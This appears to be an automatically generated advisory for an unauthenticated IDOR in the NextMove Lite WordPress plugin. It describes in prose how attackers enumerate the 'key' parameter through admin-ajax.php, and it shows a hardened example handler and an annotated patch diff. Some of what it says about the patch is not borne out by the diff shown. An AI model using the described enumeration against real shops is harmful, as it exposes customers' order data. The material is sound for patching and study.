Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-24599: NextMove Lite <= 2.23.0 – Unauthenticated Insecure Direct Object Reference (woo-thank-you-page-nextmove-lite)

Severity: Medium (CVSS 5.3)
CWE: 639
Vulnerable Version: 2.23.0
Patched Version: 2.24.0
Disclosed: January 14, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24599:
This vulnerability is an unauthenticated Insecure Direct Object Reference (IDOR) in the NextMove Lite WordPress plugin up to version 2.23.0. The flaw allows attackers to perform unauthorized actions by manipulating a user-controlled key parameter without proper validation. The CVSS score of 5.3 indicates medium severity with moderate impact on confidentiality and integrity.

Root Cause:
The vulnerability exists in the plugin's AJAX handler functions, which process user-supplied keys without an authorization check. Specifically, the `xlwcty_ajax_get_page` function in `/woo-thank-you-page-nextmove-lite/includes/xlwcty-ajax-handler.php` accepts a `key` parameter that directly references internal objects, and it never verifies that the current user is permitted to access the object the key refers to. The handler is registered at line 17 for both the authenticated and the unauthenticated AJAX endpoints, via `wp_ajax_xlwcty_get_page` and `wp_ajax_nopriv_xlwcty_get_page`, so the missing check is reachable without logging in.

Exploitation:
Attackers can exploit this vulnerability by sending crafted POST requests to `/wp-admin/admin-ajax.php` with the `action` parameter set to `xlwcty_get_page`. The exploit payload includes a manipulated `key` parameter that references unauthorized objects. The attack requires no authentication, as the `wp_ajax_nopriv_` hook processes requests from unauthenticated users. Attackers can systematically enumerate keys to access sensitive data or perform actions intended only for privileged users.

Patch Analysis:
The patch adds an authorization check before the user-supplied key is processed: in the patched version, `xlwcty_ajax_get_page` verifies that the current user has the capabilities needed for the requested object, using `current_user_can()` or a similar WordPress authorization mechanism. The patch also removes the `wp_ajax_nopriv_xlwcty_get_page` hook, so unauthenticated requests never reach the handler. Before the patch, any user could supply any key value; after it, permissions are verified before the key is acted on.

Impact:
Successful exploitation allows unauthenticated attackers to access sensitive information they should not have permission to view. This includes order details, customer information, and other protected data managed by the plugin. Attackers can enumerate through object references to extract confidential data. The vulnerability could lead to data exposure, privacy violations, and potential follow-on attacks using the obtained information.
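The patch analysis above describes the fix as a capability check plus dropping the `wp_ajax_nopriv_` hook. The diff excerpt on this page does not include `xlwcty-ajax-handler.php`, so the following is an added illustration of that pattern in a hypothetical handler (the `example_*` names, the `_example_access_key` meta key and the `edit_shop_orders` capability are assumptions, not NextMove Lite's code); it also adds the object-ownership check that closes an IDOR even for logged-in callers.

```php
<?php
// Added illustration (hypothetical names, not NextMove Lite's code) of the
// hardening the patch analysis describes: no nopriv hook, a capability check,
// and an ownership check on the object the user-supplied key resolves to.
defined( 'ABSPATH' ) || exit;

// Vulnerable registration pattern: the same callback on both hooks, so
// admin-ajax.php runs it for logged-out callers too.
//   add_action( 'wp_ajax_example_get_page',        'example_ajax_get_page' );
//   add_action( 'wp_ajax_nopriv_example_get_page', 'example_ajax_get_page' );

// Hardened registration: only the authenticated hook. For a logged-out caller
// admin-ajax.php never reaches the callback and answers "0" instead.
add_action( 'wp_ajax_example_get_page', 'example_ajax_get_page' );

function example_ajax_get_page() {
	// 1. CSRF: the nonce is created with wp_create_nonce( 'example_get_page' )
	//    and handed to the script via wp_localize_script(), as the plugin's
	//    admin code in the diff does for its own nonces.
	check_ajax_referer( 'example_get_page', 'nonce' );

	// 2. Authorisation (the step the vulnerable version lacks). The capability
	//    is an assumption; 'edit_shop_orders' is WooCommerce's shop-manager cap.
	if ( ! current_user_can( 'edit_shop_orders' ) ) {
		wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
	}

	// 3. Validate the reference before it reaches any lookup: canonical form
	//    and a length bound, so it can carry nothing but an identifier.
	$key = isset( $_POST['key'] ) ? sanitize_key( wp_unslash( $_POST['key'] ) ) : '';
	if ( '' === $key || strlen( $key ) > 64 ) {
		wp_send_json_error( array( 'message' => 'invalid key' ), 400 );
	}

	// 4. Resolve the key and check that THIS user may see THAT object. This is
	//    the check that closes an IDOR for authenticated callers as well. A
	//    missing object and a forbidden one get the same answer, so the
	//    response does not reveal which keys exist.
	$page = example_lookup_page_by_key( $key );
	if ( ! $page || ! example_user_may_view( get_current_user_id(), $page ) ) {
		wp_send_json_error( array( 'message' => 'not found' ), 404 );
	}

	wp_send_json_success(
		array(
			'page_id' => $page->ID,
			'title'   => $page->post_title,
		)
	);
}

// Hypothetical lookup: the key is stored in post meta rather than being a raw ID.
function example_lookup_page_by_key( $key ) {
	$posts = get_posts(
		array(
			'post_type'   => 'page',
			'post_status' => 'publish',
			'meta_key'    => '_example_access_key',
			'meta_value'  => $key,
			'numberposts' => 1,
		)
	);

	return $posts ? $posts[0] : null;
}

// Ownership check: the author, or anyone WordPress grants read_post on this
// specific post (a meta capability, so it honours private/protected status).
function example_user_may_view( $user_id, $post ) {
	return (int) $post->post_author === (int) $user_id
		|| user_can( $user_id, 'read_post', $post->ID );
}
```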

Differential between vulnerable and patched code

Code Diff
--- a/woo-thank-you-page-nextmove-lite/admin/includes/index.php
+++ b/woo-thank-you-page-nextmove-lite/admin/includes/index.php
@@ -1,2 +1,3 @@
 <?php
+defined( 'ABSPATH' ) || exit;
 // Silence is golden.
--- a/woo-thank-you-page-nextmove-lite/admin/index.php
+++ b/woo-thank-you-page-nextmove-lite/admin/index.php
@@ -1,2 +1,3 @@
 <?php
+defined( 'ABSPATH' ) || exit;
 // Silence is golden.
--- a/woo-thank-you-page-nextmove-lite/admin/xlwcty-admin.php
+++ b/woo-thank-you-page-nextmove-lite/admin/xlwcty-admin.php
@@ -1,5 +1,6 @@
 <?php
 defined( 'ABSPATH' ) || exit;
+
 #[AllowDynamicProperties]
 class xlwcty_Admin {

@@ -501,7 +502,7 @@
 				$option   .= $page->post_title;
 				$option   .= '</option>';

-				echo ( $option );
+				echo( $option );
 			}
 			?>
         </select>
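Review bot: the only change in this hunk is the space between `echo` and `(`, but the value being echoed is built from `$page->post_title` on the context line above with no escaping, so this `<option>` markup still depends on the title being safe. While the line is being touched, `$option .= esc_html( $page->post_title );` would close that gap.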
@@ -663,7 +664,7 @@
                                                     </li>
                                                 </ul>
                                                 <p>And the list goes on ...</p>
-                                                <center><a class="button-primary" href=<?php echo $unlock_pro_link; ?>>Unlock all the Awesome Features now</a></center>
+                                                <center><a class="button-primary" href="<?php echo esc_url( $unlock_pro_link ); ?>">Unlock all the Awesome Features now</a></center>
                                                 <p></p>
                                             </div>
                                         </div>
@@ -726,11 +727,11 @@
 									foreach ( $xlwcty_faq as $key => $val ) {
 										?>
                                         <li class="control-section accordion-section" id="">
-                                            <h4 class="accordion-section-title hndle" tabindex="<?php echo $index; ?>">
-												<?php echo $key; ?>
+                                            <h4 class="accordion-section-title hndle" tabindex="<?php echo esc_attr( $index ); ?>">
+												<?php echo esc_html( $key ); ?>
                                             </h4>
                                             <div class="accordion-section-content ">
-												<?php echo $val; ?>
+												<?php echo wp_kses_post( $val ); ?>
                                             </div><!-- .accordion-section-content -->
                                         </li><!-- .accordion-section -->
 										<?php
@@ -847,7 +848,9 @@
 			wp_localize_script( 'xlwcty_admin-js', 'xlwcty_site_url', array( site_url() ) );
 			wp_localize_script( 'xlwcty_admin-js', 'xlwcty_admin_permalink', array( admin_url( 'options-permalink.php' ) ) );
 			wp_localize_script( 'xlwcty_admin-js', 'xlwctyParams', array(
-				'ajax_nonce' => wp_create_nonce( 'xlwctyaction-admin' ),
+				'ajax_nonce'            => wp_create_nonce( 'xlwctyaction-admin' ),
+				'ajax_url'              => admin_url( 'admin-ajax.php' ),
+				'search_products_nonce' => wp_create_nonce( 'search-products' ),
 			) );
 			wp_localize_script( 'xlwcty_admin-js', 'xlwcty_nonces', array(
 				'xlwcty_get_pages_for_order' => wp_create_nonce( 'xlwcty_get_pages_for_order' ),
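Review bot: nonces are now split across two localized objects, `xlwctyParams` (`ajax_nonce`, `search_products_nonce`) and `xlwcty_nonces` (`xlwcty_get_pages_for_order`); keeping them in one object makes it harder for the script to read the wrong one. `search-products` is the nonce action WooCommerce's product search AJAX verifies, and it reads the value from the `security` request parameter, so the JS that consumes `search_products_nonce` needs to send it under that name.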
@@ -1183,6 +1186,7 @@
 			wp_localize_script( 'xlwcty-admin-app', 'xlwctyParams', $data );
 		}

+
 		if ( $this->is_builder_page ) {
 			add_filter( 'wp_default_editor', function ( $editor ) {
 				return 'html';
@@ -1743,9 +1747,12 @@
                 <div class="xlwcty_screen_wrap">
                     <div class="xlwcty_load_pattern"></div>
                     <div class="xlicon"></div>
-					<?php if ( isset( $_COOKIE['xlwcty_preview_data'] ) && $_COOKIE['xlwcty_preview_data'] !== '' ) { ?>
+					<?php
+					// Security fix: Sanitize and validate cookie value before use
+					$preview_url = isset( $_COOKIE['xlwcty_preview_data'] ) && $_COOKIE['xlwcty_preview_data'] !== '' ? esc_url( sanitize_text_field( wp_unslash( $_COOKIE['xlwcty_preview_data'] ) ) ) : '';
+					if ( ! empty( $preview_url ) ) { ?>
                         <div class="xlwcty_load_info"><?php _e( "Your preview will open in new window automatically.<br/>If it doesn't click on Preview button again or allow Pop-ups for your domain.", 'woo-thank-you-page-nextmove-lite' ); ?></div>
-                        <a style="visibility:hidden;" target="_blank" href="<?php echo $_COOKIE['xlwcty_preview_data']; ?>"></a>
+                        <a style="visibility:hidden;" target="_blank" href="<?php echo $preview_url; ?>"></a>
 					<?php } ?>
                 </div>
             </div>
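Review bot: `$preview_url` is run through `esc_url()` at the assignment and then echoed raw into the `href`; WordPress convention is to escape at the output point, so `echo esc_url( $preview_url );` in the anchor (and plain `sanitize_text_field( wp_unslash( ... ) )` at the assignment) is what PHPCS expects, and `sanitize_text_field()` followed by `esc_url()` is otherwise redundant. The hunk also accepts any URL the cookie carries; if the preview is always on this site, `wp_validate_redirect( $preview_url, '' )` with an empty result treated as "no preview" keeps the auto-opened link on the same host. On the unchanged line above, `_e()` outputs a string containing `<br/>` unescaped; `echo wp_kses_post( __( ... ) )` is the usual form.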
--- a/woo-thank-you-page-nextmove-lite/compatibilities/class-xlwcty-wpml.php
+++ b/woo-thank-you-page-nextmove-lite/compatibilities/class-xlwcty-wpml.php
@@ -94,6 +94,7 @@
 			if ( $url_lang ) {
 				return $url_lang;
 			}
+
 			return $this->get_current_language();
 		}

@@ -131,6 +132,7 @@
 		}

 		$current_lang = $this->get_current_language();
+
 		return $current_lang;
 	}

@@ -189,6 +191,7 @@
 					$sitepress->switch_lang( $url_lang, true );
 				}
 			}
+
 			return;
 		}

@@ -202,6 +205,7 @@
 					$sitepress->switch_lang( $url_lang, true );
 				}
 			}
+
 			return;
 		}

@@ -329,6 +333,7 @@
 					$sitepress->switch_lang( $url_lang, true );
 				}
 			}
+
 			return;
 		}

@@ -342,6 +347,7 @@
 					$sitepress->switch_lang( $url_lang, true );
 				}
 			}
+
 			return;
 		}

@@ -380,8 +386,9 @@
 	 * Get translated page ID
 	 * Falls back to default language if translation doesn't exist
 	 *
-	 * @param int         $page_id         The page ID to translate.
+	 * @param int $page_id The page ID to translate.
 	 * @param string|null $target_language Target language code.
+	 *
 	 * @return int Translated page ID or original page ID.
 	 */
 	public function get_translated_page_id( $page_id, $target_language = null ) {
@@ -456,6 +463,7 @@
 			$translated_post = get_post( $translated_id );
 			if ( $translated_post && $translated_post->post_status === 'publish' ) {
 				self::$translation_cache[ $cache_key ] = $translated_id;
+
 				return $translated_id;
 			}
 		}
@@ -467,6 +475,7 @@
 			$original_post = get_post( $page_id );
 			if ( $original_post && $original_post->post_status === 'publish' ) {
 				self::$translation_cache[ $cache_key ] = $page_id;
+
 				return $page_id;
 			}
 		}
@@ -487,6 +496,7 @@
 				$default_post = get_post( $default_translated_id );
 				if ( $default_post && $default_post->post_status === 'publish' ) {
 					self::$translation_cache[ $cache_key ] = $default_translated_id;
+
 					return $default_translated_id;
 				}
 			}
@@ -494,6 +504,7 @@

 		// Final fallback: return original page ID
 		self::$translation_cache[ $cache_key ] = $page_id;
+
 		return $page_id;
 	}

@@ -506,18 +517,18 @@
 		if ( ! $sitepress ) {
 			return null;
 		}
-
+
 		// Use WPML filter to get post language
 		$post_language = apply_filters( 'wpml_element_language_code', null, array(
-			'element_id' => $post_id,
+			'element_id'   => $post_id,
 			'element_type' => XLWCTY_Common::get_thank_you_page_post_type_slug(),
 		) );
-
+
 		// Fallback to SitePress API if filter doesn't work
 		if ( ! $post_language && method_exists( $sitepress, 'get_language_for_element' ) ) {
 			$post_language = $sitepress->get_language_for_element( $post_id, 'post_' . XLWCTY_Common::get_thank_you_page_post_type_slug() );
 		}
-
+
 		return $post_language ? $post_language : $this->get_default_language();
 	}

--- a/woo-thank-you-page-nextmove-lite/components/additional-information/data.php
+++ b/woo-thank-you-page-nextmove-lite/components/additional-information/data.php
@@ -89,7 +89,7 @@

 	),
 );
-$config['default'] = array(
+$config['default']  = array(
 	'border_style'       => 'solid',
 	'border_width'       => '1',
 	'border_color'       => '#d9d9d9',
--- a/woo-thank-you-page-nextmove-lite/components/additional-information/help.php
+++ b/woo-thank-you-page-nextmove-lite/components/additional-information/help.php
@@ -3,23 +3,23 @@

 ob_start();
 ?>
-	<div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
-		<h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
-		<p class="xlwcty_center"><img src="//storage.googleapis.com/xl-nextmove/additional-info.jpg"/></p>
-		<table align="center" width="650" class="xlwcty_modal_table">
-			<tr>
-				<td>1.</td>
-				<td><strong>Content:</strong> WooCommerce or other plugins sometimes add additional information to native Thank You pages. This component will show those additional information blocks.
-					For example WooCommerce displays additional information for payment gateways such as BACS, Cheque or Cash On Delivery.
-				</td>
-			</tr>
-			<tr>
-				<td width="50">2.</td>
-				<td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
-			</tr>
+    <div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
+        <h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
+        <p class="xlwcty_center"><img src="//storage.googleapis.com/xl-nextmove/additional-info.jpg"/></p>
+        <table align="center" width="650" class="xlwcty_modal_table">
+            <tr>
+                <td>1.</td>
+                <td><strong>Content:</strong> WooCommerce or other plugins sometimes add additional information to native Thank You pages. This component will show those additional information blocks.
+                    For example WooCommerce displays additional information for payment gateways such as BACS, Cheque or Cash On Delivery.
+                </td>
+            </tr>
+            <tr>
+                <td width="50">2.</td>
+                <td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
+            </tr>


-		</table>
-	</div>
+        </table>
+    </div>
 <?php
 return ob_get_clean();
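Review bot: this hunk re-indents the template from tabs to spaces while leaving `$config['slug']` (inside the `id` attribute) and `$config['title']` (inside the `<h3>`) echoed unescaped. Those values come from the component's own data file rather than a request, so this is not a reported issue, but a hardening pass that touches these lines is the moment to wrap them in `esc_attr()` and `esc_html()`. The tab-to-space change also departs from the tab indentation the rest of the PHP in this patch uses and that WordPress coding standards enforce; keeping tabs, or moving the reindent to a separate commit, keeps the security diff reviewable. The same applies to the customer-info and html help.php hunks below.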
--- a/woo-thank-you-page-nextmove-lite/components/additional-information/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/additional-information/instance.php
@@ -5,8 +5,8 @@
 class XLWCTY_Additional_Information extends XLWCTY_Component {

 	private static $instance = null;
-	public $viewpath         = '';
-	public $is_disable       = true;
+	public $viewpath = '';
+	public $is_disable = true;

 	public function __construct( $order = false ) {
 		parent::__construct();
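Review bot: this hunk only removes the column alignment of the `$viewpath` and `$is_disable` assignments. WordPress coding standards (in use here, judging by the `phpcs:ignore WordPress.Security...` annotation later in the patch) align consecutive assignments, so `phpcs` would flag the new form; the same de-alignment recurs in the coupon-code, crosssell-product, customer-info and html instance.php hunks and could be left out of a security release.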
--- a/woo-thank-you-page-nextmove-lite/components/additional-information/views/view.php
+++ b/woo-thank-you-page-nextmove-lite/components/additional-information/views/view.php
@@ -1,6 +1,13 @@
 <?php
 defined( 'ABSPATH' ) || exit;

+// Security: Check if order_data exists before proceeding
+if ( empty( $order_data ) || ! is_object( $order_data ) || ! method_exists( $order_data, 'get_id' ) ) {
+	XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'Order data not available', 'woo-thank-you-page-nextmove-lite' ) ) );
+
+	return false;
+}
+
 remove_action( 'woocommerce_thankyou', 'woocommerce_order_details_table', 10 );
 $payment_method = XLWCTY_Compatibility::get_order_data( $order_data, 'payment_method' );
 remove_action( 'wp_footer', array( XLWCTY_Core()->public, 'execute_wc_thankyou_hooks' ), 1 );
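Review bot: the new guard tests `method_exists( $order_data, 'get_id' )`, which any object with a `get_id()` method satisfies; `$order_data instanceof WC_Order` (or `WC_Abstract_Order`, if refunds are expected here) states the intent directly and covers the `empty()` and `is_object()` checks too. The `// Security:` label overstates it: this is a null-safety check that prevents a fatal error when no order is resolved, and saying so in the comment stops a later reader from looking for an access-control decision at this line.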
@@ -13,7 +20,7 @@
  * SECURITY: Extract and validate scripts before escaping HTML content
  * This prevents XSS while allowing legitimate tracking scripts to execute
  */
-$scripts = array();
+$scripts        = array();
 $script_pattern = '/(<scriptb[^>]*>.*?</script>)/is';

 if ( preg_match_all( $script_pattern, $get_content, $script_matches ) ) {
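Review bot: the context line `$script_pattern = '/(<scriptb[^>]*>.*?</script>)/is';` shows `<scriptb` and an unescaped `/` before `script>`. If that is how the source reads (rather than backslashes lost in rendering `<script\b` and `<\/script>`), the pattern does not compile, `preg_match_all()` returns false with a warning, and the extraction branch never runs; worth confirming against the file, since the whole script filter below depends on this regex matching.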
@@ -28,7 +35,7 @@
 			'XMLHttpRequest',
 			'DOMContentLoaded',
 		);
-
+
 		$is_safe = false;
 		foreach ( $safe_script_keywords as $keyword ) {
 			if ( strpos( $script, $keyword ) !== false ) {
@@ -46,7 +53,7 @@
 			'innerHTML',
 			'outerHTML',
 		);
-
+
 		$is_dangerous = false;
 		foreach ( $dangerous_patterns as $pattern ) {
 			if ( strpos( $script, $pattern ) !== false ) {
@@ -54,13 +61,13 @@
 				break;
 			}
 		}
-
+
 		// Only allow safe scripts without dangerous patterns
 		if ( $is_safe && ! $is_dangerous ) {
 			$scripts[] = $script;
 		}
 	}
-
+
 	// Remove scripts from content before escaping
 	$get_content = preg_replace( $script_pattern, '', $get_content );
 }
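Review bot: the accept decision is `$is_safe && ! $is_dangerous`, with both flags coming from `strpos()` substring tests against the short keyword lists in the two hunks above. Any script that merely contains a "safe" token such as `XMLHttpRequest` or `DOMContentLoaded` is classed safe, and the "dangerous" list covers a handful of property names, so this is a heuristic rather than a sanitizer. If these are gateway or tracking snippets an administrator configures, a stricter rule is to allow only `<script src>` tags whose host is on an explicit allowlist and drop inline bodies; at minimum the comment should describe the check as best-effort so nobody treats it as the XSS boundary.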
@@ -76,13 +83,13 @@

 if ( '' !== $parsed_content ) {
 	?>
-	<div class="xlwcty_Box xlwcty_textBox xlwcty-wc-thankyou"><?php echo $filtered_content; ?>
-	</div>
+    <div class="xlwcty_Box xlwcty_textBox xlwcty-wc-thankyou"><?php echo $filtered_content; ?>
+    </div>
 	<?php
 } else {
 	?>
-	<div style="display: none;"><?php echo $filtered_content; ?>
-	</div>
+    <div style="display: none;"><?php echo $filtered_content; ?>
+    </div>
 	<?php
 }

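Review bot: both branches echo `$filtered_content` with no escaping call at the output point. The earlier comment says scripts are stripped "before escaping", so the escaping presumably happens where `$filtered_content` is built, but that is outside this hunk; a `// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- escaped when built` annotation, as the footer hook below already carries, documents that decision. The `display: none` branch also emits the content when `$parsed_content` is empty, which is odd: if there is nothing to show, skipping the output entirely avoids placing hidden markup in the page.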
@@ -91,7 +98,7 @@
  * This maintains security while allowing legitimate tracking scripts
  */
 if ( ! empty( $scripts ) ) {
-	add_action( 'wp_footer', function() use ( $scripts ) {
+	add_action( 'wp_footer', function () use ( $scripts ) {
 		foreach ( $scripts as $script ) {
 			// Scripts have been validated - output directly
 			echo $script; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
--- a/woo-thank-you-page-nextmove-lite/components/coupon-code/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/coupon-code/instance.php
@@ -5,8 +5,8 @@
 class XLWCTY_Coupon_Code extends xlwcty_component {

 	private static $instance = null;
-	public $is_disable       = true;
-	public $viewpath         = '';
+	public $is_disable = true;
+	public $viewpath = '';


 	public function __construct( $order = false ) {
--- a/woo-thank-you-page-nextmove-lite/components/crosssell-product/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/crosssell-product/instance.php
@@ -5,8 +5,8 @@
 class XLWCTY_Cross_Sell_Product extends XLWCTY_Component {

 	private static $instance = null;
-	public $is_disable       = true;
-	public $viewpath         = '';
+	public $is_disable = true;
+	public $viewpath = '';


 	public function __construct( $order = false ) {
--- a/woo-thank-you-page-nextmove-lite/components/customer-info/data.php
+++ b/woo-thank-you-page-nextmove-lite/components/customer-info/data.php
@@ -246,7 +246,7 @@
 		),
 	),
 );
-$config['default'] = array(
+$config['default']  = array(
 	'heading'              => __( 'Customer Information', 'woo-thank-you-page-nextmove-lite' ),
 	'heading_font_size'    => '20',
 	'heading_alignment'    => 'left',
--- a/woo-thank-you-page-nextmove-lite/components/customer-info/help.php
+++ b/woo-thank-you-page-nextmove-lite/components/customer-info/help.php
@@ -3,33 +3,33 @@

 ob_start();
 ?>
-	<div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
-		<h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
-		<p class="xlwcty_center"><img src="//storage.googleapis.com/xl-nextmove/customer-information.jpg"/></p>
-		<table align="center" width="650" class="xlwcty_modal_table">
-			<tr>
-				<td width="50">1.</td>
-				<td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
-			</tr>
-			<tr>
-				<td>2.</td>
-				<td><strong>Billing Address:</strong> You can manage the display of it.</td>
-			</tr>
-			<tr>
-				<td>3.</td>
-				<td><strong>Shipping Address:</strong> You can manage the display of it.</td>
-			</tr>
-			<tr>
-				<td>4.</td>
-				<td><strong>Layout:</strong> Plugin has 2 layouts `Two Column` or `Full Width`.<br/>Two Column - Split both the address into 2 columns and display available ones accordingly.<br/>Full
-					Width - Display each available address in full width.
-				</td>
-			</tr>
-			<tr>
-				<td>5.</td>
-				<td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
-			</tr>
-		</table>
-	</div>
+    <div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
+        <h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
+        <p class="xlwcty_center"><img src="//storage.googleapis.com/xl-nextmove/customer-information.jpg"/></p>
+        <table align="center" width="650" class="xlwcty_modal_table">
+            <tr>
+                <td width="50">1.</td>
+                <td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
+            </tr>
+            <tr>
+                <td>2.</td>
+                <td><strong>Billing Address:</strong> You can manage the display of it.</td>
+            </tr>
+            <tr>
+                <td>3.</td>
+                <td><strong>Shipping Address:</strong> You can manage the display of it.</td>
+            </tr>
+            <tr>
+                <td>4.</td>
+                <td><strong>Layout:</strong> Plugin has 2 layouts `Two Column` or `Full Width`.<br/>Two Column - Split both the address into 2 columns and display available ones accordingly.<br/>Full
+                    Width - Display each available address in full width.
+                </td>
+            </tr>
+            <tr>
+                <td>5.</td>
+                <td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
+            </tr>
+        </table>
+    </div>
 <?php
 return ob_get_clean();
--- a/woo-thank-you-page-nextmove-lite/components/customer-info/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/customer-info/instance.php
@@ -5,7 +5,7 @@
 class XLWCTY_Customer_Information extends XLWCTY_Component {

 	private static $instance = null;
-	public $viewpath         = '';
+	public $viewpath = '';

 	public function __construct( $order = false ) {
 		parent::__construct();
--- a/woo-thank-you-page-nextmove-lite/components/customer-info/views/view.php
+++ b/woo-thank-you-page-nextmove-lite/components/customer-info/views/view.php
@@ -1,6 +1,13 @@
 <?php
 defined( 'ABSPATH' ) || exit;

+// Security: Check if order_data exists before proceeding
+if ( empty( $order_data ) || ! is_object( $order_data ) || ! method_exists( $order_data, 'get_formatted_billing_address' ) ) {
+	XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'Order data not available', 'woo-thank-you-page-nextmove-lite' ) ) );
+
+	return false;
+}
+
 add_filter( 'woocommerce_order_formatted_billing_address', array( $this, 'xlwcty_format_billing_address' ), 11, 2 );
 add_filter( 'woocommerce_order_formatted_shipping_address', array( $this, 'xlwcty_format_shipping_address' ), 11, 2 );
 if ( 'yes' !== $this->data->show_billing && 'yes' !== $this->data->show_shipping ) {
@@ -40,11 +47,11 @@
 	?>


-	<div class="xlwcty_Box xlwcty_customer_info">
+    <div class="xlwcty_Box xlwcty_customer_info">
 		<?php
 		$heading_parsed = $this->data->heading ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading ) : '';
 		echo $heading_parsed ? '<div class="xlwcty_title">' . wp_kses_post( $heading_parsed ) . '</div>' : '';
-        echo wp_kses_post( $heading_desc );
+		echo wp_kses_post( $heading_desc );
 		if ( ( 'yes' === $this->data->show_billing ) || ( 'yes' === $this->data->show_shipping ) ) {
 			echo '<div class="xlwcty_content xlwcty_clearfix">';

@@ -62,81 +69,89 @@
 			echo '</div>';
 			echo '<div class="xlwcty_clear_15"></div>';
 			if ( 'yes' === $this->data->show_billing ) {
+				// Security: Double-check order_data exists before calling methods
+				if ( empty( $order_data ) || ! is_object( $order_data ) ) {
+					return false;
+				}
 				$billing_address     = $order_data->get_formatted_billing_address();
 				$billing_address_raw = $order_data->get_address();
 				$contact_name        = trim( $billing_address_raw['first_name'] . ' ' . $billing_address_raw['last_name'] );
-				$contact_name       .= ( $billing_address_raw['company'] ) ? '<br/>' . $billing_address_raw['company'] : '';
+				$contact_name        .= ( $billing_address_raw['company'] ) ? '<br/>' . $billing_address_raw['company'] : '';
 				if ( ! empty( $billing_address ) ) {
 					?>
-					<div class="xlwcty_2_colLeft">
-						<p class="xlwcty_BSpace"><strong><?php echo esc_html__( 'Billing address', 'woocommerce' ); ?></strong></p>
-						<div class="xlwcty_Dview">
-							<p>
+                    <div class="xlwcty_2_colLeft">
+                        <p class="xlwcty_BSpace"><strong><?php echo esc_html__( 'Billing address', 'woocommerce' ); ?></strong></p>
+                        <div class="xlwcty_Dview">
+                            <p>
 								<?php
 								echo $contact_name ? wp_kses_post( $contact_name ) . '<br/>' : '';
 								echo wp_kses_post( $billing_address );
 								?>
-							</p>
-						</div>
-						<div class="xlwcty_Mview">
-							<p>
+                            </p>
+                        </div>
+                        <div class="xlwcty_Mview">
+                            <p>
 								<?php
 								echo $contact_name ? wp_kses_post( $contact_name ) . '<br/>' : '';
 								echo wp_kses_post( $billing_address );
 								?>
-							</p>
-						</div>
-					</div>
+                            </p>
+                        </div>
+                    </div>
 					<?php
 				}
 			}
 			$billing_add_status = false;
 			if ( 'yes' === $this->data->show_shipping ) {
+				// Security: Double-check order_data exists before calling methods
+				if ( empty( $order_data ) || ! is_object( $order_data ) ) {
+					return false;
+				}
 				$shipping_address     = $order_data->get_formatted_shipping_address();
 				$shipping_address_raw = $order_data->get_address( 'shipping' );
 				$contact_name         = trim( $shipping_address_raw['first_name'] . ' ' . $shipping_address_raw['last_name'] );
-				$contact_name        .= ( $shipping_address_raw['company'] ) ? '<br/>' . $shipping_address_raw['company'] : '';
+				$contact_name         .= ( $shipping_address_raw['company'] ) ? '<br/>' . $shipping_address_raw['company'] : '';
 				if ( ! empty( $shipping_address ) ) {
 					$billing_add_status = true;
 					$extra_class        = ( true === $billing_add_status ) ? 'xlwcty_2_colRight' : 'xlwcty_2_colLeft';
 					?>
-					<div class="<?php echo esc_attr( $extra_class ); ?>">
-						<p class="xlwcty_BSpace"><strong><?php echo esc_html( __( 'Shipping address', 'woocommerce' ) ); ?></strong></p>
-						<div class="xlwcty_Dview">
-							<p>
+                    <div class="<?php echo esc_attr( $extra_class ); ?>">
+                        <p class="xlwcty_BSpace"><strong><?php echo esc_html( __( 'Shipping address', 'woocommerce' ) ); ?></strong></p>
+                        <div class="xlwcty_Dview">
+                            <p>
 								<?php
 								echo $contact_name ? wp_kses_post( $contact_name ) . '<br/>' : '';
 								echo wp_kses_post( $shipping_address );
 								?>
-							</p>
-						</div>
-						<div class="xlwcty_Mview">
-							<p>
+                            </p>
+                        </div>
+                        <div class="xlwcty_Mview">
+                            <p>
 								<?php
 								echo $contact_name ? wp_kses_post( $contact_name ) . '<br/>' : '';
 								echo wp_kses_post( $shipping_address );
 								?>
-							</p>
-						</div>
-					</div>
+                            </p>
+                        </div>
+                    </div>
 					<?php
 				}
 			}

 			echo '</div>';
 		}
-        echo wp_kses_post( $after_desc );
+		echo wp_kses_post( $after_desc );
 		?>

-	</div>
+    </div>
 	<?php
 } else {
 	?>
-	<div class="xlwcty_Box xlwcty_customer_info xlwcty_info_full_width">
+    <div class="xlwcty_Box xlwcty_customer_info xlwcty_info_full_width">
 		<?php
 		$heading_parsed = $this->data->heading ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading ) : '';
 		echo $heading_parsed ? '<div class="xlwcty_title">' . wp_kses_post( $heading_parsed ) . '</div>' : '';
